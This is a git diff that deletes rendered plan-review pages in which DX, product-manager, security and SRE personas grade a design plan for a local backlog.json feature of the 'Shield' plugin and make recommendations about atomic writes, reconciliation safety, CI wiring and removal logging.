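Returning False on every doubtful path keeps the predicate aligned with the "never remove on doubt" rule, and it gives the ambiguous-stays fixture a direct name-collision case to assert.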
-

Overall Persona Grade: B (3.0)

-

Average of point grades: (B + C + B + A + A + A) = (3+2+3+4+4+4)/6 = 3.33 → B.

-

The plan is well-grounded — the reconciliation read-contract is verified accurate against the live schemas (not assumed), error handling and testing strategy are A-grade, and the atomic-write framing is sound. It is held back from A by two important, named-but-unresolved interface/correctness gaps: the skill-facing write-helper signature is still open (Q3) despite being the headline PRD-review carry-forward, and N1 conflates atomicity with isolation, leaving the lost-update path under a "single actor" assumption that isn't stated where the threat is described. Resolve P1-b (lock the helper signature in EPIC-1-S1/S2 ACs) and P1-c (name the concurrency strategy + add the interleaved-capture eval) and this is an A.

diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/dx-engineer.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/dx-engineer.html
deleted file mode 100644
index fe94b8ff..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/dx-engineer.html
+++ /dev/null
@@ -1,172 +0,0 @@
Shield Plan Review
Shield Plan Review · feature backlog-20260527 · 2026-05-27 · rendered from markdown (source of truth in reviews/plan/2026-05-27/)
-

DX Engineer — Detailed Findings

-
-

Back to summary

-
-

DX Engineer Review (Grade: B)

| # | Evaluation Point | Grade | Notes |
|---|---|---|---|
| DX1 | Plan clarity | A | plan.md line 6 states the goal in one sentence; TRD §2 problem statement is crisp. 30-second comprehension easily met. |
| DX2 | Story actionability | B | All 11 stories carry tasks + AC + design_refs and reference concrete files (shield/schema/backlog.schema.json, shield/scripts/reconcile_backlog.py). EPIC-1-S2 is the weak point: the skill write-helper signature is explicitly deferred (TRD §12 Q3), so a dev cannot finalize that interface without the LLD that doesn't exist yet. |
| DX3 | Implementation step detail | B | Strong for backend tooling: names files, the validator stack (pydantic + jsonschema, run via uv), named error codes (unknown_kind_enum, schema_version_too_new), JSON Schema draft (2020-12). Gaps: "wire into CI" (EPIC-4-S1) and "render a badge line" give what, not how (no CI file path, no badge-format spec beyond an example). |
| DX4 | Ambiguity audit | B | Mostly tight. Lingering vague terms: "names expected stable" / "assumed stable" (EPIC-3-S2) is an unverified assumption baked into the match key; "best match" (EPIC-2-S2 task) and "the candidate plan.json" (plan.md L56) are undefined: no matching algorithm or tie-break rule is specified. |
| DX5 | Context sufficiency | A | TRD §11 documents the consumed read-contract, §8 records 4 rejected alternatives with rationale, §13 links prior art, PRD §2 is a glossary. A new dev has the background to start. Verified against repo: referenced shapes and dirs exist. |
| DX6 | Dependency clarity | B | Milestone deps are explicit (M1→M2→M3) and stories carry milestone_id. Gap: no story-level dependency graph. For example, EPIC-3-S3 (triggers) clearly depends on EPIC-3-S2 (engine) and EPIC-3-S1 (transient reference), but that ordering is implied, not stated. EPIC-2-S1 is tagged M1 while sitting in EPIC-2 (M2), which is correct but easy to miss without an explicit note. |
| DX7 | Tool & access requirements | B | uv is named as the runner; no credentials/accounts needed (local file, single actor; TRD §9 "Secrets/auth: none"). Not called out per-story, but the no-access nature is explicit, so the gap is low-impact. |
| DX8 | Handoff readiness | B | Largely self-contained: a dev with no Slack context could start M1 today. Two handoff blockers: (1) the capture-helper signature deferred to a non-existent LLD; (2) three design_refs point to LLD components marked TODO: link when /lld <x> lands (backlog-store, epic-suggester, reconciler). Those links resolve to nothing today, so the deepest design detail for the hardest stories (reconciler) is not yet in any document. |
| DX9 | Service boundaries | A | Clean separation: backlog_store owns atomic R/W + validation; reconcile_backlog is the single shared engine both triggers call (TRD §7, EPIC-3-S3 AC "Eager and lazy paths call the same reconciliation engine"). manifest = index, plan.json = gate is a clear, well-named ownership split. No ambiguous shared state: backlog.json has one writer path. |
| DX10 | API & data flow design | A | The backlog.json document contract is fully specified (TRD §11, F1, schema story). The consumed read-contract (manifest features[].artifacts, plan.json epics[].stories[]) is documented and I verified it matches the real manifest. Data flow diagrammed in TRD §7 and PRD §5 mermaid. Only soft spot: the skill write-helper return/signature (the one true "API" here) is deferred; counted under DX2/DX8. |
| DX11 | Deployment strategy | B | For a plugin this means release/rollback, and it is addressed: TRD §14 rollback (git revert of git-tracked backlog.json, "not invoking /backlog is a complete disable"), staged safety (destructive reconciliation lands last in M3), and a documented fallback trigger (disable eager prune → manual-only). No phased rollout beyond milestone ordering, which is acceptable for internal tooling. |
| DX12 | CI/CD integration | C | EPIC-4-S1 says "wire into CI" and "CI runs the eval on PRs touching the backlog assets" but names no workflow file, no existing CI entrypoint (e.g. which of run-eval.sh/run-evals.sh), and no path-filter mechanism. The repo has an eval runner convention the story should point at. This is the least-specified mechanical step. |
| DX13 | Error handling patterns | A | Failure modes are enumerated and given concrete strategies: never-remove-on-doubt (F7, N3), atomic temp-then-rename + validate-or-refuse (N1), crash-mid-write leaves at most a .tmp cleaned next run, malformed/old upstream shapes → entry stays + logged warning (not exception), absent-id → clear no-op. This is the plan's strongest dimension. |
| DX14 | Configuration management | B | output_dir from .shield.json → {output_dir}/backlog.json (TRD §9). schema_version migration policy (read-old/write-new) is documented. No feature flags (none needed for staged-by-milestone rollout) and no secrets (none exist). Adequate for scope; not called out per-story. |
| DX15 | Developer onboarding | B | Backlog SKILL.md is a deliverable (EPIC-1-S3, EPIC-4-S2) documenting capture/view/promote/remove + 3 triggers + match key. Gap: no local-dev/debugging guidance for the eval suite or how to run the validator/reconciler against a fixture during development; the "run it locally" loop is implied by uv run but not spelled out. |
-

Key Finding: This is a clear, architecturally sound, error-handling-first plan with verified prior art — but three design_refs point to LLD docs that don't exist yet (backlog-store, epic-suggester, reconciler) and the skill capture-helper signature is explicitly deferred, so the two hardest stories (capture interface, reconciler) are not yet fully handoff-ready.

-

Recommendations

| Priority | Point | Recommendation |
|---|---|---|
| P1 | DX8 / DX2 | Resolve TRD §12 Q3 before EPIC-1-S2 starts: add the skill write-helper signature (module location, parameter names/types for {text, kind, feature?, epic?, source}, return type = created entry id) to TRD §11 inline, OR commit to running /lld backlog-store first and mark EPIC-1-S2 blocked-on-LLD. Today the three design_refs reading TODO: link when /lld <x> lands resolve to nothing. |
| P1 | DX4 | In EPIC-2-S2 and EPIC-3-S2, replace "best match" / "names expected stable" with a concrete matching algorithm: define the feature-name and epic-name match (exact? case-insensitive? normalized?), the tie-break/ambiguity rule that triggers "entry stays", and what happens on epic-name rename. The match key is the core of reconciliation and is currently underspecified. |
| P2 | DX12 | In EPIC-4-S1, name the CI entrypoint and path filter explicitly: which runner (shield/evals/run-evals.sh vs run-eval.sh), the workflow file to edit, and the glob that scopes "backlog assets" (e.g. shield/{schema,scripts,skills/general/backlog}/**). "Wire into CI" is not actionable without it. |
| P2 | DX6 | Add an explicit intra-epic story dependency note for EPIC-3: S1 (transient reference) and S2 (engine) must land before S3 (triggers consume both). Currently only milestone-level deps are stated. |
| P2 | DX3 / DX15 | Specify the badge render format once (EPIC-2-S1 shows 'research ✓ prd ✓ plan –' as an example only) and add a one-line local-dev loop to the backlog SKILL.md deliverable (e.g. uv run shield/scripts/reconcile_backlog.py <fixture> to dry-run reconciliation). |
-

Overall persona grade: B (point average ≈ 3.4: eleven A/B-strong points; DX12 is the lone C; no Critical point graded below B, so no P0).

diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/product-manager.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/product-manager.html
deleted file mode 100644
index f2ae956d..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/product-manager.html
+++ /dev/null
@@ -1,196 +0,0 @@
Shield Plan Review · feature backlog-20260527 · 2026-05-27 · rendered from markdown (source of truth in reviews/plan/2026-05-27/)
-

Product Manager — Detailed Findings

-
-

Back to summary

-
-

The PM persona is decomposed into 10 focused dimension subagents (PM1–PM10), each returning a single-check JSON result. They are rolled up here under the PM persona.

-

Persona grade: A — dim average = (4+4+4+4+3+4+4+4+4+2)/10 = 3.7 → A.
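The roll-up above can be reproduced with a short sketch. The point mapping (A=4, B=3, C=2) is read off the numbers in the sum itself; the function name is hypothetical, and the threshold that turns 3.7 into an A is not stated in this review, so the sketch stops at the average.

```python
# Grade points as implied by the sum in the persona-grade line (assumption:
# A=4, B=3, C=2; no other letters appear for this persona).
GRADE_POINTS = {"A": 4, "B": 3, "C": 2}


def persona_average(grades):
    """Return the mean grade point for a list of letter grades."""
    return sum(GRADE_POINTS[g] for g in grades) / len(grades)


# PM1..PM10 in order, matching (4+4+4+4+3+4+4+4+4+2).
pm_grades = ["A", "A", "A", "A", "B", "A", "A", "A", "A", "C"]
pm_average = persona_average(pm_grades)
print(round(pm_average, 2))
```

The same helper can be used to cross-check the other personas' stated averages wherever they use plain A/B/C grades.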

| Dim | Name | Grade | Severity |
|---|---|---|---|
| PM1 | User impact clarity | A | Critical |
| PM2 | Problem-solution fit | A | Critical |
| PM3 | Scope discipline (plan) | A | Important |
| PM4 | Prioritization rationale | A | Important |
| PM5 | Stakeholder communicability | B | Important |
| PM6 | Market / competitive awareness | A | Warning |
| PM7 | Adoption & rollout risk | A | Important |
| PM8 | Success metrics | A | Important |
| PM9 | Reversibility & exit cost | A | Warning |
| PM10 | Business value alignment | C | Critical |
-
-

PM1 — User impact clarity — A (Critical)

-
{
-  "id": "PM1", "name": "User impact clarity", "persona": "product-manager",
-  "grade": "A", "severity": "Critical",
-  "evidence_quote": "| P1 | Ashwini — Shield maintainer running `/research`/`/plan`/`/implement` daily | Capture future work without losing focus on the current task; come back later to an ordered list of what to pick up next | Future ideas get lost or derail the current task; no ordered \"later\" list at the project level |",
-  "gap": null, "suggestion": null
-}
-
-

PRD §4 names personas P1 (Ashwini) and P2 (the agent) with concrete goals and frictions; §7 quantifies impact via success metrics.

-

PM2 — Problem-solution fit — A (Critical)

-
{
-  "id": "PM2", "name": "Problem-solution fit", "persona": "product-manager",
-  "grade": "A", "severity": "Critical",
-  "evidence_quote": "Today there is **nowhere to park that work**. The options are bad: derail the current task to chase it, or drop it in a comment / memory / someone's head and lose it.",
-  "gap": null, "suggestion": null
-}
-
-

Every capability maps one-to-one onto the stated problem (store → "nowhere to park", capture → agent-discovered-work gap, ordered list → "what next", promotion+reconciliation → "loose idea to plan"). Problem-first ordering holds; scope creep fenced in §6 non-goals.

-

PM3 — Scope discipline (plan) — A (Important)

-
{
-  "id": "PM3", "name": "Scope discipline (plan)", "persona": "product-manager",
-  "grade": "A", "severity": "Important",
-  "evidence_quote": "Out of scope:\n- Per-feature backlogs; PM-tool sync of un-promoted entries; a rejected/dropped audit trail; cross-project backlogs; priority buckets; end-of-task surfacing hooks. (See PRD §6/§11.)",
-  "gap": null, "suggestion": null
-}
-
-

MVP-shaped: TRD §3 Out of scope, PRD §6/§11 non-goals with rationale, lean PRD omits 11 standard sections by design, staged milestones, §8 alternatives reject heavier designs (A3 lifecycle engine, A4 hook reconciliation).

-

PM4 — Prioritization rationale — A (Important)

-
{
-  "id": "PM4", "name": "Prioritization rationale", "persona": "product-manager",
-  "grade": "A", "severity": "Important",
-  "evidence_quote": "**Staged safety:** M1 ships read/append + manual remove only; the destructive automatic reconciliation lands last (M3), so the risky path is introduced after the store is proven.",
-  "gap": null, "suggestion": null
-}
-
-

Explicit depends_on chain M1→M2→M3, per-story priority labels, and a staged-safety sequencing rationale in TRD §14.

-

PM5 — Stakeholder communicability — B (Important)

-
{
-  "id": "PM5", "name": "Stakeholder communicability", "persona": "product-manager",
-  "grade": "B", "severity": "Important",
-  "evidence_quote": "Future work surfaces constantly while using Shield — during `/research`, while writing a PRD, mid-`/plan`, and especially during `/implement` (\"we should also handle X later\", \"this whole area needs a rewrite\"). Today there is **nowhere to park that work**.",
-  "gap": "The plain-language WHAT/WHY lives only in the PRD; the TRD §1 overview and plan.md (the artifacts a reviewer hits first) lead with Shield-internal filesystem and pipeline jargon (manifest.json, reconciliation, eager/lazy prune) without a reader-facing summary.",
-  "suggestion": "Add a two-to-three-sentence plain-language executive summary at the top of trd.md and plan.md that states what is being built and why before the schema- and pipeline-heavy detail."
-}
-
-

PM6 — Market / competitive awareness — A (Warning)

-
{
-  "id": "PM6", "name": "Market / competitive awareness", "persona": "product-manager",
-  "grade": "A", "severity": "Warning",
-  "evidence_quote": "**A1. Stamp a `backlog_id` onto the promoted story in `plan.json`** (id-based reconciliation). Rejected: re-introduces a synthetic id and writes into `plan.json`; the feature(manifest)+epic(plan) match key reconciles with no stamping.",
-  "gap": null, "suggestion": null
-}
-
-

TRD §8 names four alternatives (A1–A4) with rejection rationale; PRD §6/§11 positions vs the incumbent PM tool's own backlog and the do-nothing baseline.

-

PM7 — Adoption & rollout risk — A (Important)

-
{
-  "id": "PM7", "name": "Adoption & rollout risk", "persona": "product-manager",
-  "grade": "A", "severity": "Important",
-  "evidence_quote": "Capture friction too high → nobody captures | Single-step capture; agent can capture without prompting | @ashwinimanoj",
-  "gap": null, "suggestion": null
-}
-
-

PRD §10 names behavioral-change risks with mitigations + owner; the load-bearing "agents reliably surface follow-up work" assumption is explicitly flagged unvalidated with a revisit trigger; §7 tracks capture-friction as a metric.

-

PM8 — Success metrics — A (Important)

-
{
-  "id": "PM8", "name": "Success metrics", "persona": "product-manager",
-  "grade": "A", "severity": "Important",
-  "evidence_quote": "≥70% reach a terminal state (promoted/landed in a plan, or explicitly dropped) within 30 days; <20% sit untouched >60 days",
-  "gap": null, "suggestion": null
-}
-
-

PRD §7 has a quantified, time-bound metrics table (≥70%, <20%, 100%, ≥60%) with counters and a stated manual/git-history measurement plan (TRD N6). Soft spot: "capture friction" is qualitative.

-

PM9 — Reversibility & exit cost — A (Warning)

-
{
-  "id": "PM9", "name": "Reversibility & exit cost", "persona": "product-manager",
-  "grade": "A", "severity": "Warning",
-  "evidence_quote": "**Steps to undo:** `backlog.json` is git-tracked — `git revert` (or restore the file) recovers any wrongly-removed entry. The `/backlog` command is additive to the plugin; not invoking it is a complete disable.",
-  "gap": null, "suggestion": null
-}
-
-

TRD §14 assesses the exit ramp, staged risk profile, and a named fallback trigger; corroborated by §6 N4 and §9 schema_version migration.

-

PM10 — Business value alignment — C (Critical)

-
{
-  "id": "PM10", "name": "Business value alignment", "persona": "product-manager",
-  "grade": "C", "severity": "Critical",
-  "evidence_quote": "**(unvalidated)** The volume/loss of future-work items today is high enough to justify the tool — no baseline count has been measured; v1's own `backlog.json` history will validate it.",
-  "gap": "The tool's core justification is an operational-savings claim (avoiding lost future-work) that the docs themselves flag as unvalidated with no measured baseline, so the business value is asserted rather than evidenced.",
-  "suggestion": "Capture even a rough baseline — e.g. count lost/re-derived future-work items over a recent week of Shield usage from git history or chat logs — to ground the operational-savings claim before committing all four milestones."
-}
-
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/security-engineer.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/security-engineer.html
deleted file mode 100644
index ed0a6fda..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/security-engineer.html
+++ /dev/null
@@ -1,176 +0,0 @@
Shield Plan Review · feature backlog-20260527 · 2026-05-27 · rendered from markdown (source of truth in reviews/plan/2026-05-27/)
-

Security Engineer — Detailed Findings

-
-

Back to summary

-
-

Security Engineer Review (Grade: B)

| # | Evaluation Point | Grade | Notes |
|---|---|---|---|
| SE1 | Threat model coverage | B | Concrete threats are named and mitigated: concurrent-write corruption (N1), wrong removal / epic-name collision (PRD §10 risk table, TRD §14 trigger), read-contract drift (N3). Adversary model is implicit ("single actor, no network"), which is reasonable for the asset, but there's no explicit enumeration of the agent-as-actor threat: a source=agent writer is a semi-trusted automated actor that can inject entries unattended. No threat is listed for malicious/garbage content reaching downstream /plan / /implement via the transient promotion reference. |
| SE2 | Least-privilege design | B+ | Genuinely good for the scope. Promotion deliberately does NOT stamp ids into plan.json (F6/EPIC-3-S1) — minimizes write surface into the trusted artifact. Reconciliation is read-only against manifest.json/plan.json and only writes backlog.json. Removal is gated (never-remove-on-doubt). The only write privilege is to one file. |
| SE3 | Data protection | A− | Strong for local tooling. N4 makes removal recoverable via git revert; N1 protects integrity; atomic temp-then-rename prevents partial writes. The one gap: "plain delete, no retained history" (F5/EPIC-1-S4) means a manual remove of an entry that was never git-committed is unrecoverable — N4's recoverability claim only holds for entries that reached a commit. Not called out. |
| SE4 | Secrets management | A | Correctly scoped: TRD §9 "Secrets/auth: none — local file, no network, single actor." backlog.json holds work-item text only. No secret storage surface exists. The risk worth one line — free-text capture could accidentally contain a pasted secret that then lands in git history — is not mentioned, but it's a Warning at most. |
| SE5 | Network security | A | Genuinely out of scope and correctly claimed. No network surface; not penalized per instructions. |
| SE6 | Access control | B | Single-actor claim is justified for a local dev file. But "access control" here maps to the agent-vs-user write distinction, which the plan models (source ∈ {user, agent}) but does not enforce or use as a trust signal — an agent-captured entry is treated identically to a user one at promotion/reconciliation. That's acceptable for v1 but the source field's security purpose (provenance/audit) is undefined. |
| SE7 | Compliance requirements | A | N5 makes the explicit data-classification claim: internal, non-PII developer work-item text, same trust boundary as plan.json/manifest.json. The claim is justified — the data co-locates with and is no more sensitive than artifacts already in the repo. No regulated data, no compliance regime applies. Well-reasoned, not hand-waved. |
| SE8 | Incident response | B | TRD §14 has a real rollback/containment story: staged rollout (destructive reconciliation lands last, M3), an explicit trigger ("if eager prune produces a wrong removal git revert can't cheaply recover → disable eager prune, fall back to manual-remove-only"), and a kill switch (not invoking /backlog = full disable). Detection is the weak spot: a wrong removal is detected only by a human noticing a missing entry — N3 logs warnings on drift but nothing alerts on an actual erroneous removal. |
| SE9 | Acceptance criteria quality | B+ | ACs are largely specific and testable. Strong examples: "killing capture mid-write leaves no corrupted backlog.json (only a .tmp may remain)" (EPIC-1-S2), "prd-only feature is NOT removed" (EPIC-3-S2), "second pass is a no-op (idempotent)" (EPIC-3-S3), named validator errors. Gaps: N1's central race ("concurrent capture racing reconciliation") has no AC that actually exercises concurrency — the mid-write-kill AC tests crash-atomicity, not the two-writer race the NFR claims to defend. "Validate-or-refuse on read" has no AC proving a malformed file is refused rather than silently read. |
| SE10 | Edge case & rollback coverage | A− | Best-covered area. Edge cases enumerated and turned into fixtures (EPIC-4-S1): prd-only-stays, plan-committed-removed, ambiguous-stays, malformed-stays. Never-remove-on-doubt is the safety default. Rollback is git-revert + staged introduction + documented fallback trigger (§14). Missing edges: the .tmp cleanup ("cleaned on next run") has no failure-mode coverage if cleanup itself fails; epic-name collision across two features is mentioned as a risk but no fixture asserts it stays. |
| SE11 | Integration test strategy | B | EPIC-4 evals are self-contained, no-LLM, CI-wired, and cover the cross-file contract (backlog.json × manifest.json × plan.json) — good. But the eager-prune integration point (end of a real /plan / /implement run) is the highest-risk wiring and the eval covers it via fixtures, not via an actual command run. The read-contract coupling to upstream schemas (§11) is acknowledged but there's no contract test that fails when manifest/plan schema drifts. |
| SE12 | Regression risk assessment | A− | Blast radius is well-bounded and stated: the only destructive behavior is entry removal (§14); /backlog is additive to the plugin; promotion is read-only against plan.json (no stamping → no regression to existing planning). Staged M1→M3 sequencing puts the risky reconciliation last behind a proven store. The unaddressed regression: eager-prune hooks into /plan and /implement — a bug there could affect those commands' exit behavior, and that blast radius isn't explicitly assessed. |
| SE13 | Environment validation plan | C | Weakest point. No dev/staging/prod distinction (reasonable — it's local tooling), but there's also no smoke-test or first-run validation plan: how does a maintainer verify reconciliation is behaving correctly against their real backlog.json before trusting auto-removal? §14 mentions a fallback but not a "validate before enabling eager prune" canary step. The N2 performance budget (~1s, ≤50 features/200 entries) has no validation method attached. |
| SE14 | Security validation | B− | The security-relevant behaviors that DO get validated: atomicity (crash test), never-remove-on-doubt (fixtures), validator rejection of bad enums. Missing: no test asserting the validate-or-refuse refusal path actually refuses (only that crash leaves no corruption); no concurrency stress test for the N1 race; no negative test that promotion does NOT write to plan.json (F6 is the key trust-boundary guarantee and has an AC but no eval listed in EPIC-4-S1's coverage list). |
-

Key Finding: The plan's core integrity and safety design is strong and well-reasoned for its scope (atomic write, never-remove-on-doubt, git-revert recoverability, staged rollout), and the N5 trust-boundary/classification claim is justified — but the N1 concurrency guarantee and the F6 no-stamping trust boundary are asserted without a test that actually exercises them, so the two most security-load-bearing claims are currently unverifiable.

-

Recommendations

| Priority | Point | Recommendation |
|---|---|---|
| P1 | SE9 / SE14 | Add an eval that exercises the actual N1 race, not just crash-atomicity: spawn a concurrent capture and a reconciliation write against the same backlog.json and assert no corruption and no lost entry. The mid-write-kill AC tests a different failure mode than the "capture racing reconciliation" the NFR claims to defend. Without it, N1 is an unverified assertion. |
| P1 | SE14 | Add a negative eval to EPIC-4-S1's coverage list asserting that promotion via /plan / /implement leaves plan.json and story records byte-unchanged (no id stamping). F6 is the load-bearing trust-boundary guarantee; it has an AC but is absent from the listed eval coverage. |
| P1 | SE9 | Add an explicit AC (EPIC-1-S2) that a malformed/partial backlog.json on read is refused with a named error, not silently read or truncated. "Validate-or-refuse on read" is stated in F2/N1 but no AC proves the refusal path. |
| P2 | SE13 | Add a first-run / canary validation step before auto-removal is trusted: e.g. a --dry-run reconciliation mode that reports what would be removed, so a maintainer validates against their real backlog before enabling eager prune. Pairs naturally with the §14 fallback. |
| P2 | SE10 / SE14 | Add a fixture for epic-name collision across two different features (PRD §10 names it as a risk; §14 names it as the rollback trigger) asserting the entry stays. The proposed-new match-by-name path is the one place a wrong removal is plausible; it deserves a dedicated negative test. |
| P2 | SE1 / SE6 | Define the security purpose of the source ∈ {user, agent} field. Either state it is provenance/audit-only (and that agent and user entries are equally trusted at reconciliation), or use it. Right now an unattended source=agent writer is a semi-trusted actor with no distinct handling, and the threat model doesn't address agent-injected entries flowing into /plan via the transient reference. |
| P2 | SE3 | Note in N4/EPIC-1-S4 that git-revert recoverability only covers entries that reached a commit; a manual remove of an uncommitted entry is unrecoverable by design. Small doc fix that aligns the recoverability claim with the "plain delete, no history" decision. |
-

Overall persona grade: B (point average ≈ 3.05 → B). The plan is security-sound for local single-actor tooling with a justified trust-boundary/classification claim and genuinely good integrity/rollback design; it falls short of A because its two most security-critical guarantees (N1 concurrency, F6 no-stamping) lack tests that exercise them, and environment/first-run validation (SE13) is thin.

diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/sre.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/sre.html
deleted file mode 100644
index ff0f8f27..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/sre.html
+++ /dev/null
@@ -1,129 +0,0 @@
Shield Plan Review · feature backlog-20260527 · 2026-05-27 · rendered from markdown (source of truth in reviews/plan/2026-05-27/)
-

SRE — Detailed Findings

-
-

Back to summary

-
-

Operations Review — Plan (Grade: B)

| # | Evaluation Point | Grade | Notes |
|---|---|---|---|
| OP1 | Observability plan | B | N6 explicitly chooses no telemetry in v1; observability = the logged warning on doubt (N3, EPIC-3-S2) plus git history of backlog.json (N4) as the audit trail. Removals are auditable via git commits. Two real gaps: (a) the positive removal path (eager prune / lazy sweep actually removing an entry) is never specified to log what it removed and why it matched — only the doubt path logs. A wrong-but-confident removal leaves no breadcrumb except a git diff with no rationale. (b) No log destination/format defined (stdout? a log file? structured?). For a 3am "why did my entry vanish" investigation, git-revert recovers the data but not the reasoning. |
| OP2 | Monitoring & alerting | C | Appropriately translated: there's no daemon to alert on, and §7 success metrics define a manual /backlog audit cadence as the "health check." But thresholds that should trigger action are named in the PRD (≥70% reach terminal state, <20% untouched >60d, ≥60% suggestion-acceptance) with no defined owner cadence or trigger beyond "periodic" — nobody is told when to audit or what reading means "intervene." The N2 ~1s budget (the one real performance signal) has a defined breach action (Q1, revisit epic index) which is good, but no way to measure latency is specified — the budget is unmonitorable as written. |
| OP3 | Failure mode analysis | A | Strongest area. The destructive path (reconciliation removal) is analyzed thoroughly: wrong/over-broad removal via epic-name collision (Risk table + §14 trigger), never-remove-on-doubt as the default-safe stance (F7, N3, EPIC-3-S2), concurrent-write corruption (N1, atomic temp-then-rename + validate-or-refuse), crash-mid-write leaving at most a .tmp (N1), malformed/old upstream shapes degrading to entry-stays not exception (N3). Cascading-failure analog (a manifest/plan shape change silently breaking reconciliation) is named as read-contract coupling (§9, §11) with a "flag this consumer" note. Recovery time is implicit (git revert) but the failure enumeration is excellent. |
| OP4 | Backup & recovery | B | RPO/RTO analog handled by N4: backlog.json is git-tracked, so any wrong removal is recoverable via git revert — RPO = last commit, recovery is a documented one-liner. §14 adds a real fallback (disable eager prune, fall back to manual-remove-only). Gap: recovery assumes the file is committed — there is no statement about when backlog.json gets committed. If capture/removal happen between commits, an uncommitted wrong-removal during a working session is not recoverable by git revert (it'd need reflog/stash luck, and the eager prune fires automatically at end-of-run, possibly before any commit). The restore procedure is named but never tested/rehearsed (no eval asserts "revert restores a wrongly-pruned entry"). |
| OP5 | Capacity planning | B | Directly addressed and well-scoped for a local tool. N2 sets a concrete budget (~1s at ≤~50 features / ~200 entries) with a smart optimization already baked in (open only plan.json files the manifest flags as having a plan, not all of them). The scaling trigger and manual-intervention path are explicit: Q1 + N2 say "above that scale, revisit a project-level epic index," resolved data-driven post-M3. Gap: as noted in OP2, the budget has no measurement mechanism — "revisit if breached" is unfalsifiable without timing instrumentation, and the breach is something a human would only notice as "feels slow." The N2 numbers are also asserted, not derived from Q2's still-unmeasured volume baseline. |
| OP6 | Change management | A | The staged rollout is the standout operational decision: M1 ships read/append + manual-remove only; the destructive automatic reconciliation lands last in M3, deliberately so the risky path is introduced after the store is proven (§14, milestone deps M1→M2→M3). This is the file-tool equivalent of a canary — the blast-radius feature is gated behind two proven milestones. Rollback trigger is explicit (§14). "Not invoking /backlog is a complete disable" is a clean feature-flag analog. Eval gate (EPIC-4-S1) with RED→GREEN before release is a real merge gate. Minor: no per-trigger kill switch granularity beyond "disable eager prune" (lazy sweep on view has no independent off-switch documented). |
| OP7 | On-call readiness | C | Translated to "can a future maintainer respond when reconciliation misbehaves." Partial: §14 gives a runbook-shaped recovery (git revert; disable eager prune; fall back to manual). EPIC-4-S2 commits to documenting capture/view/promote/remove + the three triggers + match key in the command and SKILL.md. Gaps: (a) the operator-facing diagnostic story is thin — when an entry wrongly vanishes, there's no documented "how to tell which trigger removed it and why" because the removal path doesn't log its rationale (see OP1). (b) "disable eager prune" is named as the mitigation but no mechanism for that toggle is specified anywhere in the plan/stories — it's an aspiration, not a shipped switch. (c) Owner is named (@ashwinimanoj, single maintainer) but there's no escalation analog and the manual-audit cadence is undefined. |
-

Key Finding: The destructive path is thoughtfully de-risked by design (never-remove-on-doubt, staged M3-last rollout, git-revert recovery) — but the operational instrumentation around it is missing: successful removals aren't logged with rationale, the N2 latency budget has no measurement mechanism, and the §14 "disable eager prune" mitigation is named without any toggle actually being specified as a story.

-

Recommendations

| Priority | Point | Recommendation |
|---|---|---|
| P1 | OP7 | Add a story (or task under EPIC-3-S3) for an explicit kill switch — a .shield.json flag (e.g. backlog.auto_reconcile: false) that disables eager prune and lazy sweep independently, leaving manual-remove only. §14 names this fallback as the rollback action but no story ships the toggle, so the documented mitigation is currently unactionable. |
| P1 | OP1 | Make successful removals auditable, not just the doubt path. EPIC-3-S2/S3 should log every removal with {entry id, feature, epic, match-kind (id vs name), triggering run, the plan.json path that gated it}. Today only never-remove-on-doubt logs (N3); a confident-but-wrong removal leaves a git diff with no rationale — exactly the 3am case. Define the log destination/format too. |
| P1 | OP4 | Close the uncommitted-state recovery gap. Eager prune fires automatically at end-of-/plan / /implement, potentially before backlog.json is committed — at which point git revert (N4) cannot recover the entry. Either (a) commit backlog.json before the destructive prune, or (b) write the pruned entry to a transient .shield/backlog-removed.log so it's recoverable independent of git. |
| P1 | OP2 / OP5 | Instrument the N2 ~1s budget. The budget and its breach action (Q1 epic-index) are well-specified but unmeasurable — add lightweight timing to /backlog view (even a debug-gated stderr line) so "revisit if breached" is falsifiable. Without it, the only signal is a human noticing slowness. |
| P2 | OP2 / OP7 | Give the manual audit a concrete cadence and trigger. §7 names threshold metrics (≥70% terminal, <20% >60d) but only "periodic" audit — specify when (e.g. monthly) and what reading triggers action so the single owner has an actual on-call procedure rather than an open-ended chore. |
| P2 | OP4 | Add an eval that rehearses recovery: assert that after a (simulated) wrong removal, git revert / file-restore brings the entry back. EPIC-4-S1 covers remove/prune/sweep behavior but never exercises the recovery procedure N4 relies on — an untested restore path is a latent 3am surprise. |
-

Overall persona grade: B (point grades: B, C, A, B, B, A, C → average 3.0 → B). The plan is operationally mature where it matters most — failure-mode analysis (OP3) and staged change management (OP6) are A-grade, and the destructive path is genuinely well-contained. It loses ground on day-2 instrumentation: removals aren't logged with rationale, the performance budget can't be measured, and the headline rollback mitigation ("disable eager prune") is named but not shipped as a toggle.
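To make the OP1 recommendation concrete, here is a minimal sketch of a per-removal audit record carrying the fields the review asks for (entry id, feature, epic, match-kind, triggering run, gating plan.json path). The function names, key names, and the JSON-lines format are all assumptions for illustration; the plan itself does not define a log format or destination.

```python
import json
from datetime import datetime, timezone


def removal_record(entry_id, feature, epic, match_kind, trigger, plan_path):
    """Build one audit record for a reconciliation removal (hypothetical shape)."""
    if match_kind not in ("id", "name"):
        raise ValueError(f"unknown match_kind: {match_kind!r}")
    return {
        "ts": datetime.now(timezone.utc).isoformat(),
        "entry_id": entry_id,
        "feature": feature,
        "epic": epic,
        "match_kind": match_kind,   # "id" vs "name", per the recommendation
        "trigger": trigger,         # e.g. "eager-prune" or "lazy-sweep" (assumed labels)
        "plan_path": plan_path,     # the plan.json that gated the removal
    }


def format_record(record):
    """Serialize a record as one JSON line, suitable for appending to a log."""
    return json.dumps(record, sort_keys=True)
```

One line per removal would let a maintainer answer "which trigger removed this entry and why" without reconstructing it from a git diff.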

